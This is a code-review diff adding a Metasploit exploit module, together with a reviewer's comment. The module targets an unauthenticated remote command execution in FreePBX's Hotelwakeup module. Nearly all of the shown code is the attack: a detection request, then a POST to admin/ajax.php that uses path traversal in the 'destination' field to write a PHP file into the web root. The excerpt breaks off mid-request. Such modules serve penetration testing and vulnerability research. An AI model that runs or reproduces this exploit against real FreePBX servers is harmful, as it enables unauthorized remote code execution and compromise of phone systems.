modules/exploits/linux/http/freepbx_hotelwakeup_rce.rb

```diff
@@ -0,0 +1,120 @@
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'            => 'FreePBX < 13.0.188.1 Remote root exploit',
+                      'Description'     => '
+                        This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup
+                      ',
+                      'License'         => MSF_LICENSE,
+                      'Author'          =>
+                        [
+                          'Ahmed sultan (0x4148) <0x4148@gmail.com>', # discovery of vulnerability and msf module
+                        ],
+                      'References'      =>
+                        [
+                          "NA"
+                        ],
+                      'Payload' =>
+                        {
+                          'Compat' =>
+                          {
+                            'PayloadType'  => 'cmd',
+                            'RequiredCmd'  => 'perl telnet python'
+                          }
+                        },
+                      'Platform'       => %w(linux unix),
+                      'Arch'           => ARCH_CMD,
+                      'Targets'        => [['Automatic', {}]],
+                      'Privileged'     => 'false',
+                      'DefaultTarget'  => 0,
+                      'DisclosureDate' => 'Sep 27 2016'))
+  end
+
+  def print_status(msg = '')
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
+  def print_error(msg = '')
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
+  def print_good(msg = '')
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
+  # Application Check
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
+      'headers' => {
+        'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff"
+      },
+      'vars_post' => {
+        'module' => 'hotelwakeup',
+        'command'       => 'savecall'
+      }
+    )
+
+    unless res
+      vprint_error('Connection timed out.')
+    end
+    if res.body.include? "Referrer"
+      vprint_good("Hotelwakeup module detected")
+      return Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+	end
+  end
+  def exploit
+    vprint_status('Sending payload . . .')
+    pwn = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'admin', 'ajax.php'),
+      'headers' => {
+        'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall",
+        'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
+        'User-agent' => "mostahter ;)"
+      },
+      'vars_post' => {
+        'module' => 'hotelwakeup',
+        'command'       => 'savecall',
+        'day'       => 'now',
+        'time'       => '+1 week',
+        'destination'       => '/../../../../../../var/www/html/0x4148.php',
```

Comment:
Whatever this file is called, it should be added to the list to be cleaned up post exploitation